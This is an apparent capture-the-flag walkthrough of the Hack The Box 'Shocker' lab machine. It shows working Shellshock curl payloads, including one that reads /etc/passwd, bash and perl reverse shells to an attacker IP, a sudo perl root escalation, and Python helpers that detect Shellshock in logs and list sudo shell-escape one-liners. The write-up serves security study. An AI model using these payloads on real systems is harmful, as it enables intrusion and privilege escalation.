How to crack the Shocker box without Metasploit.

tl;dr

  • Shellshock (CVE-2014-6271) through Apache mod_cgi, payload delivered in the User-Agent header
  • Privilege escalation via sudo NOPASSWD on /usr/bin/perl

Solved by : 7h3M0nk

The IP of the box is 10.10.10.56; the only other thing we know is that it is a Linux box.

Enumeration

Start with a port scan. The -p80-2222 range used here happens to cover both open ports; a full-range scan (-p-) is the safer default when nothing is known about the box.

nmap -Pn -sCV -p80-2222 10.10.10.56

Nmap scan report for 10.10.10.56
Host is up (0.19s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Mon Feb 8 05:11:07 2021 -- 1 IP address (1 host up) scanned in 13.29 seconds

Two services: Apache httpd 2.4.18 on port 80 and OpenSSH 7.2p2 on the non-standard port 2222.

Searching for known exploits for this Apache version leads to the Exploit-DB entry for Apache mod_cgi "Shellshock" remote command injection. The bug is not in Apache itself but in bash (CVE-2014-6271): mod_cgi copies request headers such as User-Agent into the environment of the CGI script (as HTTP_USER_AGENT), and an unpatched bash executes whatever follows a function definition of the form () { ... }; in any environment variable it imports. Any script under /cgi-bin/ that is written in bash, or that spawns a shell, is therefore a target.
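The mechanism in code, as an added example that is not part of the original writeup: a model of the header-to-environment mapping mod_cgi performs, the check vulnerable bash applied when importing functions from the environment, and the same check applied to Apache combined-format access log lines for detection. The log lines are constructed for the example and the function names are my own.

```python
import re
from typing import Dict, List, Optional, Tuple

# Vulnerable bash (CVE-2014-6271) treated any environment variable whose value
# started with "() {" as an exported function definition, and kept parsing
# (and executing) whatever followed the closing brace. This regex models that
# check: "body" is the function, "trailer" is the injected command.
FUNC_IMPORT = re.compile(
    r"^\s*\(\)\s*\{(?P<body>.*?)\}\s*;?(?P<trailer>.*)$", re.S
)

# Apache "combined" log format; the last two quoted fields are Referer and
# User-Agent, the same values mod_cgi exports as HTTP_REFERER / HTTP_USER_AGENT.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def cgi_environment(method: str, path: str, headers: Dict[str, str]) -> Dict[str, str]:
    """Model the RFC 3875 mapping mod_cgi applies to a request: every header
    becomes HTTP_<NAME> (upper-cased, '-' -> '_') in the script's environment.
    This is how attacker-controlled header bytes reach bash."""
    env = {"REQUEST_METHOD": method, "SCRIPT_NAME": path}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def split_function_import(value: str) -> Optional[Tuple[str, str]]:
    """Return (function_body, trailing_command) if an unpatched bash would
    have imported `value` as a function, else None. A legitimate exported
    function has an empty trailer; Shellshock payloads do not."""
    m = FUNC_IMPORT.match(value)
    if m is None:
        return None
    return m.group("body").strip(), m.group("trailer").strip()


def injected_commands(env: Dict[str, str]) -> Dict[str, str]:
    """Which environment variables carry a command that vulnerable bash would run."""
    hits = {}
    for name, value in env.items():
        parsed = split_function_import(value)
        if parsed and parsed[1]:
            hits[name] = parsed[1]
    return hits


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Detection side: (client_ip, request, field, command) for every
    combined-format line whose Referer or User-Agent is a Shellshock payload."""
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if m is None:
            continue
        for field in ("referer", "ua"):
            parsed = split_function_import(m.group(field))
            if parsed and parsed[1]:
                findings.append((m.group("ip"), m.group("req"), field, parsed[1]))
    return findings


# Constructed sample log lines (not taken from the box): one exploit attempt,
# one 403 on the directory, one ordinary request to the script.
SAMPLE_LOG = [
    '10.10.14.7 - - [08/Feb/2021:05:20:11 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 1584 '
    '"-" "() { :; }; echo; echo; /bin/bash -c \'cat /etc/passwd\'"',
    '10.10.14.7 - - [08/Feb/2021:05:10:02 +0000] "GET /cgi-bin/ HTTP/1.1" 403 299 "-" "curl/7.74.0"',
    '10.10.14.7 - - [08/Feb/2021:05:25:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    env = cgi_environment("GET", "/cgi-bin/user.sh",
                          {"Host": "10.10.10.56",
                           "User-Agent": "() { :; }; echo; echo; /bin/bash -c 'id'"})
    print(injected_commands(env))   # {'HTTP_USER_AGENT': "echo; echo; /bin/bash -c 'id'"}
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

An exported function with nothing after its closing brace is treated as benign, which is the distinction the upstream bash fix drew. On the defensive side, the log check only works when the User-Agent is logged at all: the combined format does that, the common format does not.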

Requesting http://10.10.10.56/cgi-bin/ returns 403 Forbidden: directory listing is disabled, so the script names have to be guessed.

Let's use dirb to brute-force names under /cgi-bin/, appending the extensions a CGI script is likely to have (.sh and .py).

dirb http://10.10.10.56/cgi-bin/ -X .sh,.py

START_TIME: Mon Feb 8 10:51:37 2021
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh,.py) | (.sh)(.py) [NUM = 2]
-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118)

-----------------
END_TIME: Mon Feb 8 11:07:40 2021
DOWNLOADED: 4612 - FOUND: 1

dirb finds a CGI script named user.sh. It is not a configuration file: the 200 response means mod_cgi executes it and returns its output, and a .sh script under /cgi-bin/ is almost certainly run by bash, which is exactly the Shellshock target.

Let's request it with a Shellshock payload in the User-Agent header and see whether the injected command runs.

Exploit

┌──(kali㉿kali)-[~/HackTheBox/Shocker/nmap]
└─$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.sh

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash

That worked: the contents of /etc/passwd come back in the HTTP response, so the header value reached bash and the trailing command executed. Two details of the payload matter. The two echo statements emit the blank line mod_cgi expects between the CGI headers and the body; leave them out and Apache answers 500 and you never see the output. And /bin/bash -c with absolute paths avoids depending on the minimal PATH of the CGI environment. The only regular account is shelly. Now to get a shell and grab the user flag.


Start a listener on the attacking machine first. Port 800 is below 1024, which is why nc needs sudo here; any unprivileged high port would do without it.

┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 800
[sudo] password for kali:
listening on [any] 800 ...

Then send the same payload shape with a bash reverse shell as the command:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.7/800 0>&1'" http://10.10.10.56/cgi-bin/user.sh

The listener picks up the connection:

connect to [10.10.14.7] from (UNKNOWN) [10.10.10.56] 41000
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ cd ~/
cd ~/
shelly@Shocker:/home/shelly$ ls
ls
user.txt
shelly@Shocker:/home/shelly$ cat user.txt

We own user; on to privilege escalation.

Let's see whether shelly is allowed to run anything through sudo.

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
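
An added helper, not from the writeup, that parses sudo -l output like the above and flags commands that hand out a root shell. The interpreter list and its one-liners are a small hand-picked set of the kind GTFOBins catalogues, and the embedded sudo -l text is a copy of the output shown above used as constructed input.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed copy of the `sudo -l` output shown above, embedded so the
# parser runs offline.
SUDO_L_OUTPUT = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
"""

# Well-known interpreters/tools that give a root shell when run under sudo,
# with the one-liner that does it. Hand-picked, not exhaustive.
SHELL_ESCAPES = {
    "perl":    "sudo perl -e 'exec \"/bin/bash\";'",
    "python":  "sudo python -c 'import os; os.execl(\"/bin/bash\", \"bash\")'",
    "python3": "sudo python3 -c 'import os; os.execl(\"/bin/bash\", \"bash\")'",
    "ruby":    "sudo ruby -e 'exec \"/bin/bash\"'",
    "vim":     "sudo vim -c ':!/bin/bash'",
    "find":    "sudo find . -exec /bin/bash \\; -quit",
    "bash":    "sudo bash",
    "sh":      "sudo sh",
}

# One rule line: "(runas) [TAG: ...] command[, command...]"
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Turn the 'may run the following commands' section into one dict per command."""
    rules: List[Dict[str, object]] = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE.match(line)
        if m is None:
            continue
        tags = {t.rstrip(":").upper() for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return rules


def escalation_candidates(rules: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """(command, shell one-liner) for rules that run as root (or ALL) and
    point at ALL or at something in SHELL_ESCAPES."""
    found = []
    for r in rules:
        runas_user = str(r["runas"]).split(":")[0].strip()
        if runas_user not in ("root", "ALL"):
            continue
        cmd = str(r["command"])
        if cmd == "ALL":
            found.append((cmd, "sudo /bin/bash"))
            continue
        name = os.path.basename(cmd.split()[0])
        if name in SHELL_ESCAPES:
            found.append((cmd, SHELL_ESCAPES[name]))
    return found


if __name__ == "__main__":
    for cmd, oneliner in escalation_candidates(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"{cmd}: {oneliner}")
```

Whether the rule carries NOPASSWD only decides whether you need shelly's password; a root-run interpreter is a full escalation either way, so the helper reports it regardless and keeps the flag in the parsed rule.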

shelly can run /usr/bin/perl as root without a password. Perl can exec a shell, so the shortest route is sudo perl -e 'exec "/bin/bash";' straight from the current shell. A reverse shell through perl works just as well and gives a separate root session, so let's do that and grab the root flag.

There is a useful repo named PayloadsAllTheThings (https://github.com/swisskyrepo/PayloadsAllTheThings) where one can find almost every kind of payload, including the perl reverse-shell one-liner used below.

Start a second listener on port 4242 first, then from the shelly shell run:

shelly@Shocker:/home/shelly$ sudo perl -e 'use Socket;$i="10.10.14.7";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'


┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 4242
[sudo] password for kali:
listening on [any] 4242 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.56] 53964
bash: no job control in this shell
root@Shocker:/home/shelly# whoami
whoami
root
root@Shocker:/home/shelly# cd ~/
cd ~/
root@Shocker:~# ls
ls
root.txt
root@Shocker:~# cat root.txt
cat root.txt

Solved Shocker :)